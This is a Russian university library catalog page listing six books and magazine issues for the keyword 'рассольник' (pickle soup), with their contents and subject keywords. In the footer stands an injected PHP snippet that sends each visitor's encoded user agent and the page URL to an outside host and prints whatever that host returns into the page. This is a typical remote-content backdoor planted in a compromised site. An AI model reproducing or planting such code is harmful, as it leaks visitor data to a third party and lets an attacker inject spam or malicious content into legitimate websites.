Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

72 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=РАССОЛЬНИК")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 6
1. 
Питание и общество. - Журнал, 2010г. № 7
Оглавление 
  • Гвардейский разведчик. - с.2
  • Черняев, Александр Николаевич. Поздравляем ветерана / А. Н. Черняев. - с.3
  • Родионова, Н. В ногу со временем. 80 лет Воронежской государственной технологической академии / Н. Родионова, Е. Романюк. - с.4-6
  • Забнев, Сергей. Пуэр / С. Забнев. - с.8
  • Номофилова, Наталья. "Арт-класс" / Н. Номофилова. - с.10-11
  • Кучер, Л. Дипломатический протокол и этикет / Л. Кучер, Л. Шкуратова. - с.18-19
  • Наступает грибная пора - в лес пора!. - с.20-21
  • Рассольник. - с.21
  • Юшкова, А. Кухня Таиланда: специи, фрукты и морепродукты / А. Юшкова. - с.22-23
  • Киреевский, Игорь. Вечера на хуторе близ Диканьки / И. Киреевский. - с.24-25
  • Мидии и рапаны - новая диетическая добавка. - с.26-27
  • Арефьева, Елена. Давайте извлечем урок! / Е. Арефьева. - с.27
  • Арефьева, Анастасия. Изысканно прекрасная ваниль... / А. Арефьева. - с.30
  • Черная смородина. - с.31
2. 
Питание и общество. - Журнал, 2013г. № 2
Оглавление 
  • Любина, Е. Все о супе / Е. Любина. - с.18
    Кл. слова: РАССОЛЬНИК
  • Ковалев, В. "Масленица-маслена, пьяница да гулена..." / В. Ковалев. - с.19
    Кл. слова: БЛИНЫ, МАСЛЕНИЦА
3. 
Сборник рецептур блюд и кулинарных изделий для предприятий общественного питания [Текст] / сост.: Л. Е. Голунова, М. Т. Лабзина, 2014. - 771 с.
Ключевые слова 
БУТЕРБРОД -- ЗАКУСКА БАНКЕТНАЯ -- САЛАТ -- ВИНЕГРЕТ -- СУП -- БОРЩ -- ЩИ -- РАССОЛЬНИК -- СОЛЯНКА -- СУП МОЛОЧНЫЙ -- СУП - ПЮРЕ -- СУП ХОЛОДНЫЙ -- БЛЮДА ИЗ КАРТОФЕЛЯ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ КРУП -- КАША -- ЗАПЕКАНКА -- ПУДИНГ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА РЫБНЫЕ -- БЛЮДА ИЗ МОРЕПРОДУКТОВ -- БЛЮДА МЯСНЫЕ -- ГАРНИР -- СОУС -- БЛЮДА СЛАДКИЕ -- ЯГОДЫ -- КОМПОТ -- КИСЕЛЬ -- ЖЕЛЕ -- МУСС -- САМБУК -- КРЕМ -- СЛИВКИ ВЗБИТЫЕ -- СУФЛЕ -- ПУДИНГ -- МОРОЖЕНОЕ -- НАПИТКИ -- ЧАЙ -- КОФЕ -- КАКАО -- ШОКОЛАД -- МОЛОКО -- КОКТЕЙЛЬ -- КРЮШОН -- БЛЮДА МУЧНЫЕ -- ФАРШ -- РАСХОД СЫРЬЯ -- ПОЛУФАБРИКАТЫ -- ВЗАИМОЗАМЕНЯЕМОСТЬ ПРОДУКТОВ
Держатели документа (Информация об экземплярах) 
4. 
Романова Т. В. Приятного аппетита! [Текст] / Т. В. Романова, 1990. - 200 с. [8] вкл. цв. л. с.
Ключевые слова 
КУЛИНАРИЯ ДОМАШНЯЯ -- ПИТАНИЕ РАЦИОНАЛЬНОЕ -- СЕРВИРОВКА СТОЛА -- БЛЮДА ХОЛОДНЫЕ -- ЗАКУСКА -- БУТЕРБРОД -- САЛАТ -- ВИНЕГРЕТ -- СУПЫ -- ЩИ -- БОРЩ -- РАССОЛЬНИК -- СУП - ПЮРЕ -- СУП МОЛОЧНЫЙ -- БЛЮДА РЫБНЫЕ -- БЛЮДА МЯСНЫЕ -- СОУС -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ КРУП -- БЛЮДА МУЧНЫЕ -- БЛЮДА СЛАДКИЕ -- КОМПОТ -- КИСЕЛЬ -- ЖЕЛЕ -- МУСС -- КРЕМ -- КАША ГУРЬЕВСКАЯ -- НАПИТКИ -- ТЕСТО ДРОЖЖЕВОЕ -- ПИРОГ -- ТЕСТО СЛОЕНОЕ -- МАННИК -- КЕКС -- ХВОРОСТ -- ПЕЧЕНЬЕ -- ПИРОЖНЫЕ -- ТОРТ -- ФРУКТЫ -- ОВОЩИ -- КУХНЯ ОМСКАЯ -- ЗЕЛЬЦ -- СТУДЕНЬ -- СТЕРЛЯДЬ -- ЩУКА -- ВЕРЕЩАКА -- ПЕЛЬМЕНИ -- ПАСХА
Держатели документа (Информация об экземплярах) 
5. 
Сборник рецептур блюд и кулинарных изделий для предприятий общественного питания [Текст] / сост. Л. Е. Голунова, 2001. - 688 с.
Ключевые слова 
БУТЕРБРОД -- ЗАКУСКА БАНКЕТНАЯ -- САЛАТ -- ВИНЕГРЕТ -- СУП -- БОРЩ -- ЩИ -- РАССОЛЬНИК -- СОЛЯНКА -- СУП МОЛОЧНЫЙ -- СУП - ПЮРЕ -- СУП ХОЛОДНЫЙ -- БЛЮДА ИЗ КАРТОФЕЛЯ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ КРУП -- КАША -- ЗАПЕКАНКА -- ПУДИНГ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА РЫБНЫЕ -- БЛЮДА ИЗ МОРЕПРОДУКТОВ -- БЛЮДА МЯСНЫЕ -- ГАРНИР -- СОУС -- БЛЮДА СЛАДКИЕ -- ЯГОДЫ -- КОМПОТ -- КИСЕЛЬ -- ЖЕЛЕ -- МУСС -- САМБУК -- КРЕМ -- СЛИВКИ ВЗБИТЫЕ -- СУФЛЕ -- ПУДИНГ -- МОРОЖЕНОЕ -- НАПИТКИ -- ЧАЙ -- КОФЕ -- КАКАО -- ШОКОЛАД -- МОЛОКО -- КОКТЕЙЛЬ -- КРЮШОН -- БЛЮДА МУЧНЫЕ -- ФАРШ -- РАСХОД СЫРЬЯ -- ПОЛУФАБРИКАТЫ -- ВЗАИМОЗАМЕНЯЕМОСТЬ ПРОДУКТОВ
Держатели документа (Информация об экземплярах) 
6. 
Сидорина Е. И. Современная кухня [Текст] : кулинар. рецепты из доступ. продуктов / Е. И. Сидорина, 1993. - 543 с.
Ключевые слова 
СЕРВИРОВКА СТОЛА -- ЗАКУСКА ХОЛОДНАЯ -- САЛАТ -- ВИНЕГРЕТ -- ПАШТЕТ -- ЗАЛИВНОЕ -- БУТЕРБРОД -- БЛЮДА МЯСНЫЕ -- БЛЮДА ИЗ РЫБЫ -- СЫР -- БЛЮДА ИЗ ЯИЦ -- СУП -- БОРЩ -- ЩИ -- РАССОЛЬНИК -- СУП ОВОЩНОЙ -- УХА -- СУП МОЛОЧНЫЙ -- СУП ГРИБНОЙ -- БЛИНЫ -- ОЛАДЬИ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ БОБОВЫХ -- ЗАПЕКАНКА -- ПЛОВ -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ КАРТОФЕЛЯ -- СОУС -- ТЕСТО ДРОЖЖЕВОЕ -- ТЕСТО СЛОЕНОЕ -- ТОРТЫ -- ТЕСТО БИСКВИТНОЕ -- ПЕЧЕНЬЕ -- ХВОРОСТ -- ВАФЛИ -- КЕКС -- ПИРОГ -- КРЕМ МАСЛЯНЫЙ -- КРЕМ БЕЛКОВЫЙ -- КРЕМ ЗАВАРНОЙ -- МУСС -- ЖЕЛЕ -- КОМПОТ -- КИСЕЛЬ -- БЛЮДА СЛАДКИЕ -- ЗАГОТОВКИ -- КАПУСТА КВАШЕНАЯ -- КОНСЕРВИРОВАНИЕ -- МАРИНОВАНИЕ -- ВАРЕНЬЕ -- ДЖЕМ -- ЦУКАТЫ


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2905 - 24.05.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.01 с.16 запросов, 0.75c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;